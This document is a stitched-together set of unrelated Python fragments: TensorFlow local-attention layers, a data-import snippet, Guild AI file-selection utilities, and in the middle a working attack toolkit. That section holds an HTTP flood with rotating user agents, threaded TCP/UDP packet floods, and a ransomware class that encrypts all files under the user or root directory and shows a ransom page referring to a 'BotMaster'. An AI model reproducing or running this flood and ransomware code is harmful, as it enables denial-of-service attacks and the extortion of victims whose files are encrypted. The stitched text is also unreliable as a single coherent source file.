(remote_annotation, self.id_mapping, self.with_original_date)
for remote_annotation in remote_annots_for_user)
# SWITCH back to admin
connect_as(self.super_admin, True)
# --------------------------------------------------------------------------------------------------------------
logging.info("5/ Import metadata (properties, attached files, description)")
obj = Model()
obj.id = -1
obj.class_ = ""
properties_json = [f for f in os.listdir(self.working_path) if
f.endswith(".json") and f.startswith("properties")]
for property_json in properties_json:
for remote_prop in json.load(open(os.path.join(self.working_path, property_json))):
| |
output: a tensor of the same shape as x
"""
with tf.variable_scope(
name, default_name="right_shift_blockwise", values=[x]):
x_list_shape = x.get_shape().as_list()
x_shape = common_layers.shape_list(x)
# Add a dummy dimension for heads.
x = tf.expand_dims(x, axis=1)
x = pad_to_multiple_2d(x, query_shape)
padded_x_shape = common_layers.shape_list(x)
# Set up q blocks.
x_indices = gather_indices_2d(x, query_shape, query_shape)
x_new = get_shifted_center_blocks(x, x_indices)
# Put representations back into original shapes.
output = scatter_blocks_2d(x_new, x_indices, padded_x_shape)
# Remove the dummy head dimension.
output = tf.squeeze(output, axis=1)
# Remove the padding if introduced.
output = tf.slice(output, [0, 0, 0, 0], [-1, x_shape[1], x_shape[2], -1])
output.set_shape(x_list_shape)
return output
def masked_local_attention_2d(q,
k,
v,
query_shape=(8, 16),
memory_flange=(8, 16),
name=None):
"""Strided block local self-attention.
Each position in a query block can attend to all the generated queries in
the query block, which are generated in raster scan, and positions that are
generated to the left and top. The shapes are specified by query shape and
memory flange. Note that if you're using this function, you do not need to
right shift. Right shifting happens inside this function separately for each
block.
Args:
q: a Tensor with shape [batch, heads, h, w, depth_k]
k: a Tensor with shape [batch, heads, h, w, depth_k]
v: a Tensor with shape [batch, heads, h, w, depth_v]. In the current
implementation, depth_v must be equal to depth_k.
query_shape: an tuple indicating the height and width of each query block.
query_shape = block_shape
memory_flange: an integer indicating how much to look in height and width
from each query block.
memory shape = query_shape + (block_flange[0], 2*block_flange[1])
name: an optional string
Returns:
a Tensor of shape [batch, heads, h, w, depth_v]
"""
with tf.variable_scope(
name, default_name="local_masked_self_attention_2d", values=[q, k, v]):
v_shape = common_layers.shape_list(v)
# Pad query to ensure multiple of corresponding lengths.
q = pad_to_multiple_2d(q, query_shape)
# Set up query blocks.
q_indices = gather_indices_2d(q, query_shape, query_shape)
q_new = gather_blocks_2d(q, q_indices)
# Set up key and value blocks.
k_flange, k_center = get_memory_region(k, query_shape, memory_flange,
q_indices)
v_flange, v_center = get_memory_region(v, query_shape, memory_flange,
q_indices)
if k_flange is not None:
k_new = tf.concat([k_flange, k_center], axis=3)
v_new = tf.concat([v_flange, v_center], axis=3)
else:
k_new = k_center
v_new = v_center
# Set up the masks.
query_elements = np.prod(query_shape)
padding_mask = None
if k_flange is not None:
padding_mask = tf.expand_dims(
embedding_to_padding(k_flange) * -1e9, axis=-2)
padding_mask = tf.tile(padding_mask, [1, 1, 1, query_elements, 1])
center_attention_bias = attention_bias_lower_triangle(
np.prod(query_elements))
center_attention_bias = tf.reshape(
center_attention_bias, [1, 1, 1, query_elements, query_elements])
v_center_shape = common_layers.shape_list(v_center)
center_attention_bias = tf.tile(
center_attention_bias,
[v_center_shape[0], v_center_shape[1], v_center_shape[2], 1, 1])
if padding_mask is not None:
# Combine the mask for padding and visible region.
attention_bias = tf.concat([padding_mask, center_attention_bias], axis=4)
else:
attention_bias = center_attention_bias
output = dot_product_attention(
q_new,
k_new,
v_new,
attention_bias,
dropout_rate=0.,
name="masked_local_2d",
make_image_summary=False)
# Put representations back into original shapes.
padded_q_shape = common_layers.shape_list(q)
output = scatter_blocks_2d(output, q_indices, padded_q_shape)
# Remove the padding if introduced.
output = tf.slice(output, [0, 0, 0, 0, 0],
[-1, -1, v_shape[2], v_shape[3], -1])
return output
def compute_attention_component(antecedent,
total_depth,
filter_width=1,
padding="VALID",
name="c",
vars_3d_num_heads=0):
"""Computes attention compoenent (query, key or value).
Args:
antecedent: a Tensor with shape [batch, length, channels]
total_depth: an integer
filter_width: An integer specifying how wide you want the attention
component to be.
padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
name: a string specifying scope name.
vars_3d_num_heads: an optional integer (if we want to use 3d variables)
Returns:
c : [batch, length, depth] tensor
"""
if vars_3d_num_heads > 0:
assert filter_width == 1
input_depth = antecedent.get_shape().as_list()[-1]
depth_per_head = total_depth // vars_3d_num_heads
initializer_stddev = input_depth ** -0.5
if "q" in name:
initializer_stddev *= depth_per_head ** -0.5
var = tf.get_variable(
name, [input_depth,
vars_3d_num_heads,
total_depth // vars_3d_num_heads],
initializer=tf.random_normal_initializer(stddev=initializer_stddev))
var = tf.cast(var, antecedent.dtype)
var = tf.reshape(var, [input_depth, total_depth])
return tf.tensordot(antecedent, var, axes=1)
if filter_width == 1:
return common_layers.dense(
antecedent, total_depth, use_bias=False, name=name)
else:
return common_layers.conv1d(
antecedent, total_depth, filter_width, padding=padding, name=name)
def compute_qkv(query_antecedent,
memory_antecedent,
total_key_depth,
total_value_depth,
q_filter_width=1,
kv_filter_width=1,
q_padding="VALID",
kv_padding="VALID",
vars_3d_num_heads=0):
"""Computes query, key and value.
Args:
query_antecedent: a Tensor with shape [batch, length_q, channels]
memory_antecedent: a Tensor with shape [batch, length_m, channels]
total_key_depth: an integer
total_value_depth: an integer
q_filter_width: An integer specifying how wide you want the query to be.
kv_filter_width: An integer specifying how wide you want the keys and values
to be.
q_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
kv_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
vars_3d_num_heads: an optional (if we want to use 3d variables)
Returns:
q, k, v : [batch, length, depth] tensors
"""
if memory_antecedent is None:
memory_antecedent = query_antecedent
q = compute_attention_component(
query_antecedent,
total_key_depth,
q_filter_width,
q_padding,
"q",
vars_3d_num_heads=vars_3d_num_heads)
k = compute_attention_component(
memory_antecedent,
total_key_depth,
kv_filter_width,
kv_padding,
"k",
vars_3d_num_heads=vars_3d_num_heads)
v = compute_attention_component(
memory_antecedent,
total_value_depth,
kv_filter_width,
kv_padding,
"v",
vars_3d_num_heads=vars_3d_num_heads)
return q, k, v
def multihead_attention(query_antecedent,
memory_antecedent,
bias,
total_key_depth,
total_value_depth,
output_depth,
num_heads,
dropout_rate,
shared_rel=False,
max_relative_position=None,
image_shapes=None,
attention_type="dot_product",
block_length=128,
block_width=128,
q_filter_width=1,
kv_filter_width=1,
q_padding="VALID",
kv_padding="VALID",
cache=None,
gap_size=0,
num_memory_blocks=2,
name="multihead_attention",
save_weights_to=None,
make_image_summary=True,
dropout_broadcast_dims=None,
max_length=None,
vars_3d=False,
**kwargs):
"""Multihead scaled-dot-product attention with input/output transformations.
Args:
query_antecedent: a Tensor with shape [batch, length_q, channels]
memory_antecedent: a Tensor with shape [batch, length_m, channels] or None
bias: bias Tensor (see attention_bias())
total_key_depth: an integer
total_value_depth: an integer
output_depth: an integer
num_heads: an integer dividing total_key_depth and total_value_depth
dropout_rate: a floating point number
shared_rel: boolean to share relative embeddings
max_relative_position: Maximum distance between inputs to generate
unique relation embeddings for. Only relevant
when using "dot_product_relative" attention.
image_shapes: optional tuple of integer scalars.
see comments for attention_image_summary()
attention_type: a string, either "dot_product", "dot_product_relative",
"local_mask_right", "local_unmasked", "masked_dilated_1d",
"unmasked_dilated_1d", graph, or any attention function
with the signature (query, key, value, **kwargs)
block_length: an integer - relevant for "local_mask_right"
block_width: an integer - relevant for "local_unmasked"
q_filter_width: An integer specifying how wide you want the query to be.
kv_filter_width: An integer specifying how wide you want the keys and values
to be.
q_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
kv_padding: One of "VALID", "SAME" or "LEFT". Default is "VALID":
no padding.
cache: dict containing Tensors which are the results of previous
attentions, used for fast decoding. Expects the dict to contrain two
keys ('k' and 'v'), for the initial call the values for these keys
should be empty Tensors of the appropriate shape.
'k' [batch_size, 0, key_channels]
'v' [batch_size, 0, value_channels]
gap_size: Integer option for dilated attention to indicate spacing between
memory blocks.
num_memory_blocks: Integer option to indicate how many memory blocks to look
at.
name: an optional string.
save_weights_to: an optional dictionary to capture attention weights
for vizualization; the weights tensor will be appended there under
a string key created from the variable scope (including name).
make_image_summary: Whether to make an attention image summary.
dropout_broadcast_dims: an optional list of integers less than 4
specifying in which dimensions to broadcast the dropout decisions.
saves memory.
max_length: an integer - needed by relative attention
vars_3d: use 3-dimensional variables for input/output transformations
**kwargs (dict): Parameters for the attention function
Caching:
WARNING: For decoder self-attention, i.e. when memory_antecedent == None,
the caching assumes that the bias contains future masking.
The caching works by saving all the previous key and value values so that
you are able to send just the last query location to this attention
function. I.e. if the cache dict is provided it assumes the query is of the
shape [batch_size, 1, hidden_dim] rather than the full memory.
Returns:
The result of the attention transformation. The output shape is
[batch_size, length_q, hidden_dim]
unless the cache dict is provided in which case only the last memory
position is calculated and the output shape is [batch_size, 1, hidden_dim]
Optionally returns an additional loss parameters (ex: load balance loss for
the experts) returned by the attention_type function.
Raises:
ValueError: if the key depth or value depth are not divisible by the
number of attention heads.
"""
if total_key_depth % num_heads != 0:
raise ValueError("Key depth (%d) must be divisible by the number of | |
NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
code = 0
if not self.stopatk:
try:
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size, thr_count):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.thread_count = thr_count
self.havingskillissues = False
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
while not self.stop:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
if self.havingskillissues:
self.havingskillissues = False
time.sleep(self.delay)
except KeyboardInterrupt:
self.stop = True
except Exception as e:
if "too big" in str(e).lower():
self.pkt_size -= 1
if not self.havingskillissues:
self.havingskillissues = True
def TCP_req(self):
while not self.stop:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
if self.havingskillissues:
self.havingskillissues = False
time.sleep(self.delay)
except KeyboardInterrupt:
self.stop = True
except Exception as e:
if "too big" in str(e).lower():
self.pkt_size -= 1
if not self.havingskillissues:
self.havingskillissues = True
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
for i in range(self.thread_count):
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
except KeyboardInterrupt:
self.stop = True
except:
pass
def UDP_Flood(self):
for i in range(self.thread_count):
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
except KeyboardInterrupt:
self.stop = True
except:
pass
class RansomWare:
def __init__(self, key):
self.key = key
self.fernet = Fernet(self.key)
self.dirlist = []
self.filelist = []
self.keyfile = "key.txt"
self.recovery_directory = ""
if sys.platform == "win32":
os.chdir("C:/Users/")
self.recovery_directory = f"C:/Users/{os.getlogin()}/"
else:
self.recovery_directory = "/"
os.chdir("/")
def get_dir_list(self):
for i in os.listdir():
try:
file = open(i, "rb")
file.close()
self.filelist.append(os.path.join(os.getcwd(),i))
except:
self.dirlist.append(os.path.join(os.getcwd(), i))
def encrypt_file(self, file):
try:
with open(file, "rb") as og_file:
content = self.fernet.encrypt(og_file.read())
og_file.close()
with open(file, "wb") as enc_file:
enc_file.write(content)
enc_file.close()
except:
pass
def encrypt(self):
self.get_dir_list()
for i in self.dirlist:
try:
os.chdir(i)
self.get_dir_list()
except:
pass
for i in self.filelist:
file_thread = threading.Thread(target=self.encrypt_file, args=(i,))
file_thread.start()
self.ransom()
self.checker = threading.Thread(target=self.check_key_file)
self.checker.start()
def decrypt(self):
for i in self.filelist:
try:
with open(i,"rb") as enc_file:
content = self.fernet.decrypt(enc_file.read())
enc_file.close()
with open(i,"wb") as new_file:
new_file.write(content)
new_file.close()
except:
pass
def download_emotional_support(self):
cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
_cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
def recovering_html_code(self):
return '''
<!DOCTYPE html>
<head>
<style>
#roundedCorners {
border-radius: 25px;
border-spacing: 0;
}
#roundedCorners td,
#roundedCorners th {
border-bottom: 1px solid rgb(0, 0, 0);
padding: 10px;
}
#roundedCorners tr:last-child > td {
border-bottom: none;
}
</style>'''+f'''
</head>
<title>Yay! | You've entered the correct encryption key!</title>
<body bgcolor='skyblue'>
<div style="font-family: sans-serif; text-align: center;">
<h1 style="text-align: center;">You entered the correct encryption key!</h1>
<table style="margin-left: auto; margin-right: auto; background-color: rgb(96, 99, 255);" id="roundedCorners">
<tr>
<td><h1>Lucky you!</h1></td>
</tr>
<tr>
<td>
<h3>Soon you will have your files back!</h3>
</td>
</tr>
<tr>
<td>
<h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2>
<h2>Please wait a moment, as the decrypted files are being decrypted at this moment.
<h4>You can say your goodbyes to Barbara!</h4>
</td>
</tr>
<tr>
<td>
<img src="barbara.png" alt="Where is the image?" width="300" height="500" style="margin-left: auto; margin-right: auto;">
</td>
</tr>
</table>
</div>
</body>
'''
def ransom_html_code(self):
return '''
<!DOCTYPE html>
<head>
<style>
#roundedCorners {
border-radius: 25px;
border-spacing: 0;
}
#roundedCorners td,
#roundedCorners th {
border-bottom: 1px solid rgb(0, 0, 0);
padding: 10px;
}
#roundedCorners tr:last-child > td {
border-bottom: none;
}
</style>'''+f'''
</head>
<body bgcolor='red'>
<div style="font-family: sans-serif; text-align: center;">
<title>Oops! | You've been Compromised!</title>
<h1 style="text-align: center;">You have been compromised!</h1>
<table style="margin-left: auto; margin-right: auto; background-color: rgb(255, 80, 67);" id="roundedCorners">
<tr>
<td><h1>Oops!</h1></td>
</tr>
<tr>
<td>
<h2>Looks like your files have been encrypted.</h2>
<h3>There is hope.</h3>
</td>
</tr>
<tr>
<td>
A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br>
Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br>
How you will get your key? Well, that's all up to the BotMaster.
<h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br>
</td>
</tr>
<tr>
<td>
<img src="barbara.png" alt="Where is the image?" width="300" height="500" style="margin-left: auto; margin-right: auto;">
</td>
</tr>
</table>
</div>
</body>
'''
def check_key_file(self):
while True:
try:
file = open(f"{self.recovery_directory}{self.keyfile}","rb")
content = file.read()
if | |
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import glob
import hashlib
import logging
import os
import re
import shutil
import six
from guild import util
log = logging.getLogger("guild")
class FileSelect:
def __init__(self, root, rules):
self.root = root
self.rules = rules
self._disabled = None
@property
def disabled(self):
if self._disabled is None:
self._disabled = self._init_disabled()
return self._disabled
def _init_disabled(self):
"""Returns True if file select is disabled.
Assumes not disabled until finds a disable all pattern (untyped
match of '*'). Disable pattern can be reset by any include
pattern.
"""
disabled = False
for rule in self.rules:
if rule.result:
disabled = False
elif "*" in rule.patterns and rule.type is None:
disabled = True
return disabled
def select_file(self, src_root, relpath):
"""Apply rules to file located under src_root with relpath.
All rules are applied to the file. The last rule to apply
(i.e. its `test` method returns a non-None value) determines
whether or not the file is selected - selected if test returns
True, not selected if returns False.
If no rules return a non-None value, the file is not selected.
Returns a tuple of the selected flag (True or False) and list
of applied rules and their results (two-tuples).
"""
rule_results = [
(rule.test(src_root, relpath), rule)
for rule in self.rules
if rule.type != "dir"
]
result, _test = reduce_file_select_results(rule_results)
return result is True, rule_results
def prune_dirs(self, src_root, relroot, dirs):
pruned = []
for name in sorted(dirs):
last_rule_result = None
relpath = os.path.join(relroot, name)
for rule in self.rules:
if rule.type != "dir":
continue
rule_result, _test = rule.test(src_root, relpath)
if rule_result is not None:
last_rule_result = rule_result
if last_rule_result is False:
log.debug("skipping directory %s", relpath)
pruned.append(name)
dirs.remove(name)
return pruned
def reduce_file_select_results(results):
"""Reduces a list of file select results to a single determining result."""
for (result, test), _rule in reversed(results):
if result is not None:
return result, test
return None, None
class FileSelectRule:
def __init__(
self,
result,
patterns,
type=None,
regex=False,
sentinel=None,
size_gt=None,
size_lt=None,
max_matches=None,
):
self.result = result
if isinstance(patterns, six.string_types):
patterns = [patterns]
if not regex:
patterns = _native_paths(patterns)
self.patterns = patterns
self.regex = regex
self._patterns_match = self._patterns_match_f(patterns, regex)
self.type = self._validate_type(type)
self.sentinel = sentinel
self.size_gt = size_gt
self.size_lt = size_lt
self.max_matches = max_matches
self._matches = 0
def _patterns_match_f(self, patterns, regex):
if regex:
return self._regex_match_f(patterns)
else:
return self._fnmatch_f(patterns)
@staticmethod
def _regex_match_f(patterns):
compiled = [re.compile(p) for p in patterns]
return lambda path: any((p.match(util.norm_path_sep(path)) for p in compiled))
@staticmethod
def _fnmatch_f(patterns):
return lambda path: any((_fnmatch(path, p) for p in patterns))
@staticmethod
def _validate_type(type):
valid = ("text", "binary", "dir")
if type is not None and type not in valid:
raise ValueError(
"invalid value for type %r: expected one of %s"
% (type, ", ".join(valid))
)
return type
@property
def matches(self):
return self._matches
def reset_matches(self):
self._matches = 0
def test(self, src_root, relpath):
fullpath = os.path.join(src_root, relpath)
tests = [
FileSelectTest("max matches", self._test_max_matches),
FileSelectTest("pattern", self._test_patterns, relpath),
FileSelectTest("type", self._test_type, fullpath),
FileSelectTest("size", self._test_size, fullpath),
]
for test in tests:
if not test():
return None, test
self._matches += 1
return self.result, None
def _test_max_matches(self):
if self.max_matches is None:
return True
return self._matches < self.max_matches
def _test_patterns(self, path):
return self._patterns_match(path)
def _test_type(self, path):
if self.type is None:
return True
if self.type == "text":
return self._test_text_file(path)
elif self.type == "binary":
return self._test_binary_file(path)
elif self.type == "dir":
return self._test_dir(path)
else:
assert False, self.type
@staticmethod
def _test_text_file(path):
return util.safe_is_text_file(path)
@staticmethod
def _test_binary_file(path):
return not util.safe_is_text_file(path)
def _test_dir(self, path):
if not os.path.isdir(path):
return False
if self.sentinel:
return glob.glob(os.path.join(path, self.sentinel))
return True
def _test_size(self, path):
if self.size_gt is None and self.size_lt is None:
return True
size = util.safe_filesize(path)
if size is None:
return True
if self.size_gt and size > self.size_gt:
return True
if self.size_lt and size < self.size_lt:
return True
return False
def _native_paths(patterns):
return [p.replace("/", os.path.sep) for p in patterns]
def _fnmatch(path, pattern):
if os.path.sep not in pattern:
path = os.path.basename(path)
pattern = _strip_leading_path_sep(pattern)
return fnmatch.fnmatch(path, pattern)
def _strip_leading_path_sep(pattern):
while pattern:
if pattern[0] != os.path.sep:
break
pattern = pattern[1:]
return pattern
class FileSelectTest:
def __init__(self, name, test_f, *test_args):
self.name = name
self.test_f = test_f
self.test_args = test_args
def __call__(self):
return self.test_f(*self.test_args)
def include(patterns, **kw):
return FileSelectRule(True, patterns, **kw)
def exclude(patterns, **kw):
return FileSelectRule(False, patterns, **kw)
class FileCopyHandler:
def __init__(self, src_root, dest_root, select):
self.src_root = src_root
self.dest_root = dest_root
self.select = select
def copy(self, path, _rule_results):
src = os.path.join(self.src_root, path)
dest = os.path.join(self.dest_root, path)
log.debug("copying %s to %s", src, dest)
util.ensure_dir(os.path.dirname(dest))
self._try_copy_file(src, dest)
def _try_copy_file(self, src, dest):
try:
shutil.copyfile(src, dest)
shutil.copymode(src, dest)
except IOError as e:
if e.errno != 2: # Ignore file not exists
if not self.handle_copy_error(e, src, dest):
raise
except OSError as e: # pylint: disable=duplicate-except
if not self.handle_copy_error(e, src, dest):
raise
def ignore(self, _path, _rule_results):
pass
@staticmethod
def handle_copy_error(_e, _src, _dest):
return False
def copytree(dest, select, root_start=None, followlinks=True, handler_cls=None):
"""Copies files to dest for a FileSelect.
root_start is an optional location from which select.root, if
relative, starts. Defaults to os.curdir.
If followlinks is True (the default), follows linked directories
when copying the tree.
A handler class may be specified to create a handler of copy
events. FileCopyHandler is used by default. If specified, the
class is used to instantiate a handler with `(src, dest,
select)`. Handler methods `copy()` and `ignore()` are called with
`(relpath, results)` where `results` is a list of results from
each rule as `(result, rule)` tuples.
As an optimization, `copytree` skips evaluation of files if the
file select is disabled. File selects are disabled if no files can
be selected for their rules. If select is disabled and a handler
class is specified, the handler is still instantiated, however, no
calls to `copy()` or `ignore()` will be made.
"""
src = _copytree_src(root_start, select)
# Instantiate handler as part of the copytree contract.
handler = (handler_cls or FileCopyHandler)(src, dest, select)
if select.disabled:
return
for root, dirs, files in os.walk(src, followlinks=followlinks):
dirs.sort()
relroot = _relpath(root, src)
pruned = select.prune_dirs(src, relroot, dirs)
for name in pruned:
relpath = os.path.join(relroot, name)
handler.ignore(relpath, [])
for name in sorted(files):
relpath = os.path.join(relroot, name)
selected, results = select.select_file(src, relpath)
if selected:
handler.copy(relpath, results)
else:
handler.ignore(relpath, results)
def _copytree_src(root_start, select):
root_start = root_start or os.curdir
if select.root:
return os.path.join(root_start, select.root)
return root_start
def _relpath(path, start):
if path == start:
return ""
return os.path.relpath(path, start)
def files_digest(root):
files = _files_for_digest(root)
if not files:
return None
md5 = hashlib.md5()
for path in files:
normpath = _normalize_path_for_digest(path, root)
md5.update(_encode_file_path_for_digest(normpath))
md5.update(b"\x00")
_apply_digest_file_bytes(path, md5)
md5.update(b"\x00")
return md5.hexdigest()
def _files_for_digest(root):
all = []
for path, _dirs, files in os.walk(root, followlinks=False):
for name in files:
all.append(os.path.join(path, name))
all.sort()
return all
def _normalize_path_for_digest(path, root):
relpath = os.path.relpath(path, root)
return relpath.replace(os.path.sep, "/")
def _encode_file_path_for_digest(path):
return path.encode("UTF-8")
def _apply_digest_file_bytes(path, d):
BUF_SIZE = 1024 * 1024
with open(path, "rb") as f:
while True:
buf = f.read(BUF_SIZE)
if not buf:
break
d.update(buf)
def disk_usage(path):
total = _file_size(path)
for root, dirs, names in os.walk(path, followlinks=False):
for name in dirs + names:
path = os.path.join(root, name)
total += _file_size(os.path.join(root, name))
return total
def _file_size(path):
stat = os.lstat if os.path.islink(path) else os.stat
try:
return stat(path).st_size
except (OSError, IOError) as e:
log.warning("could not read size of %s: %s", path, e)
return 0
def find(root, followlinks=False, includedirs=False, unsorted=False):
all = []
relpath = lambda path, name: (os.path.relpath(os.path.join(path, name), root))
for path, dirs, files in os.walk(root, followlinks=followlinks):
for name in dirs:
if includedirs or os.path.islink(os.path.join(path, name)):
all.append(relpath(path, name))
for name in files:
all.append(relpath(path, name))
return all if unsorted else sorted(all)
def expand_path(path):
return os.path.expanduser(os.path.expandvars(path))
